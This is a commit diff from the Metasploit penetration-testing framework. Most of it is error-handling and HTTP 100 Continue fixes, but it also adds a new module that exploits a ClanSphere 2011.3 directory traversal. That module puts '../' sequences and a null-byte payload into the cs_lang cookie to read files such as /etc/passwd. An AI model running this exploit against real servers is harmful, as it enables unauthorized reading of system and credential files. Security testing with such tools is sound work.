Merge branch 'upstream-master' into WinRM_piecemeal

Author: David Maloney

lib/msf/core/handler/bind_tcp.rb

@@ -127,7 +127,7 @@ def start_handler
 				rescue Rex::ConnectionRefused
 					# Connection refused is a-okay
 				rescue ::Exception
-					wlog("Exception caught in bind handler: #{$!}")
+					wlog("Exception caught in bind handler: #{$!.class} #{$!}")
 				end
 
 				break if client
@@ -138,7 +138,6 @@ def start_handler
 
 			# Valid client connection?
 			if (client)
-
 				# Increment the has connection counter
 				self.pending_connections += 1
 

lib/rex/io/stream_abstraction.rb

@@ -149,6 +149,9 @@ def monitor_rsock
 							closed = true
 							wlog("monitor_rsock: closed remote socket due to nil read")
 						end
+					rescue EOFError => e
+						closed = true
+						dlog("monitor_rsock: EOF in rsock")
 					rescue ::Exception => e
 						closed = true
 						wlog("monitor_rsock: exception during read: #{e.class} #{e}")

lib/rex/post/meterpreter/client.rb

@@ -154,7 +154,7 @@ def swap_sock_plain_to_ssl
 		ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
 
 		# Use non-blocking OpenSSL operations on Windows
-		if not ( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
+		if !( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
 			ssl.accept
 		else
 			begin
@@ -211,12 +211,19 @@ def generate_ssl_context
 		cert.version = 2
 		cert.serial  = rand(0xFFFFFFFF)
 
+		# Depending on how the socket was created, getsockname will
+		# return either a struct sockaddr as a String (the default ruby
+		# Socket behavior) or an Array (the extend'd Rex::Socket::Tcp
+		# behavior). Avoid the ambiguity by always picking a random
+		# hostname. See #7350.
+		subject_cn = Rex::Text.rand_hostname
+
 		subject = OpenSSL::X509::Name.new([
 				["C","US"],
 				['ST', Rex::Text.rand_state()],
 				["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
 				["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
-				["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
+				["CN", subject_cn],
 			])
 		issuer = OpenSSL::X509::Name.new([
 				["C","US"],

lib/rex/proto/http/client.rb

@@ -365,7 +365,7 @@ def send_request(req, t = -1)
 	#
 	# Read a response from the server
 	#
-	def read_response(t = -1)
+	def read_response(t = -1, opts = {})
 
 		resp = Response.new
 		resp.max_data = config['read_max_data']
@@ -392,7 +392,7 @@ def read_response(t = -1)
 
 				##########################################################################
 				# XXX: NOTE: BUG: get_once currently (as of r10042) rescues "Exception"
-				# As such, the following rescue block will ever be reached.  -jjd
+				# As such, the following rescue block will never be reached.  -jjd
 				##########################################################################
 
 				# Handle unexpected disconnects
@@ -434,14 +434,20 @@ def read_response(t = -1)
 		return resp if not resp
 
 		# As a last minute hack, we check to see if we're dealing with a 100 Continue here.
-		if resp.proto == '1.1' and resp.code == 100
-			# If so, our real response becaome the body, so we re-parse it.
-			body = resp.body
-			resp = Response.new
-			resp.max_data = config['read_max_data']
-			rv = resp.parse(body)
-			# XXX: At some point, this may benefit from processing post-completion code
-			# as seen above.
+		# Most of the time this is handled by the parser via check_100()
+		if resp.proto == '1.1' and resp.code == 100 and not opts[:skip_100]
+			# Read the real response from the body if we found one
+			# If so, our real response became the body, so we re-parse it.
+			if resp.body.to_s =~ /^HTTP/
+				body = resp.body
+				resp = Response.new
+				resp.max_data = config['read_max_data']
+				rv = resp.parse(body)
+			# We found a 100 Continue but didn't read the real reply yet
+			# Otherwise reread the reply, but don't try this hack again
+			else
+				resp = read_response(t, :skip_100 => true)
+			end
 		end
 
 		resp

lib/rex/proto/http/packet.rb

@@ -367,6 +367,7 @@ def parse_body
 			if (self.body_bytes_left == 0)
 				self.bufq.sub!(/^\r?\n/s,'')
 				self.state = ParseState::Completed
+				self.check_100
 				return
 			end
 
@@ -396,10 +397,15 @@ def parse_body
 		# ready to go.
 		if (not self.transfer_chunked and self.body_bytes_left == 0)
 			self.state = ParseState::Completed
+			self.check_100
 			return
 		end
 	end
 
+	# Override this as needed
+	def check_100
+	end
+
 end
 
 end

lib/rex/proto/http/response.rb

@@ -53,6 +53,9 @@ def initialize(code = 200, message = 'OK', proto = DefaultProtocol)
 		# default chunk sizes (if chunked is used)
 		self.chunk_min_size = 1
 		self.chunk_max_size = 10
+
+		# 100 continue counter
+		self.count_100 = 0
 	end
 
 	#
@@ -66,6 +69,19 @@ def update_cmd_parts(str)
 		else
 			raise RuntimeError, "Invalid response command string", caller
 		end
+
+		check_100()
+	end
+
+	#
+	# Allow 100 Continues to be ignored by the caller
+	#
+	def check_100
+		# If this was a 100 continue with no data, reset
+		if self.code == 100 and (self.body_bytes_left == -1 or self.body_bytes_left == 0) and self.count_100 < 5
+			self.reset_except_queue
+			self.count_100 += 1
+		end
 	end
 
 	#
@@ -84,6 +100,7 @@ def cmd_string
 	attr_accessor :code
 	attr_accessor :message
 	attr_accessor :proto
+	attr_accessor :count_100
 end
 
 end

modules/auxiliary/admin/officescan/tmlisten_traversal.rb

@@ -51,6 +51,11 @@ def run_host(target_host)
 				'method'  => 'GET',
 			}, 20)
 
+		if not res
+			print_error("No response from server")
+			return
+		end
+
 		http_fingerprint({ :response => res })
 
 		if (res.code >= 200)

modules/auxiliary/dos/http/sonicwall_ssl_format.rb

@@ -58,7 +58,7 @@ def run
 				'uri' => datastore['URI'] + fmt,
 			})
 
-			if res.code == 200
+			if res and res.code == 200
 				res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
 				print_status("Information leaked: #{$1}")
 			end

modules/auxiliary/scanner/http/clansphere_traversal.rb

@@ -0,0 +1,91 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'ClanSphere 2011.3 Local File Inclusion Vulnerability',
+			'Description'    => %q{
+				This module exploits a directory traversal flaw found in Clansphere 2011.3.
+				The application fails to handle the cs_lang parameter properly, which can be
+				used to read any file outside the virtual directory.
+			},
+			'References'     =>
+				[
+					['OSVDB', '86720'],
+					['EDB', '22181']
+				],
+			'Author'         =>
+				[
+					'blkhtc0rp',  #Original
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'DisclosureDate' => "Oct 23 2012"
+		))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']),
+				OptString.new('FILE',      [true, 'The file to obtain', '/etc/passwd']),
+				OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+			], self.class)
+	end
+
+
+	def run_host(ip)
+		base = target_uri.path
+		base << '/' if base[-1,1] != '/'
+
+		peer = "#{ip}:#{rport}"
+
+		print_status("#{peer} - Reading '#{datastore['FILE']}'")
+
+		traverse = "../" * datastore['DEPTH']
+		f = datastore['FILE']
+		f = f[1, f.length] if f =~ /^\//
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{base}index.php",
+			'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
+		})
+
+		if res and res.body =~ /^Fatal error\:/
+			print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:")
+			print_error("\t1. File does not exist.")
+			print_error("\t2. No permission.")
+			print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
+
+		elsif res and res.code == 200
+			pattern_end = "     UTC +1 - Load:"
+			data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip
+			fname = datastore['FILE']
+			p = store_loot(
+				'clansphere.cms',
+				'application/octet-stream',
+				ip,
+				data,
+				fname
+			)
+
+			vprint_line(data)
+			print_good("#{peer} - #{fname} stored as '#{p}'")
+
+		else
+			print_error("#{peer} - Fail to obtain file for some unknown reason")
+		end
+	end
+
+end

modules/auxiliary/scanner/http/ektron_cms400net.rb

@@ -67,7 +67,7 @@ def run_host(ip)
 
 			#Check for HTTP 200 response.
 			#Numerous versions and configs make if difficult to further fingerprint.
-			if (res.code == 200)
+			if (res and res.code == 200)
 				print_status("Ektron CMS400.NET install found at #{target_url}  [HTTP 200]")
 
 				#Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.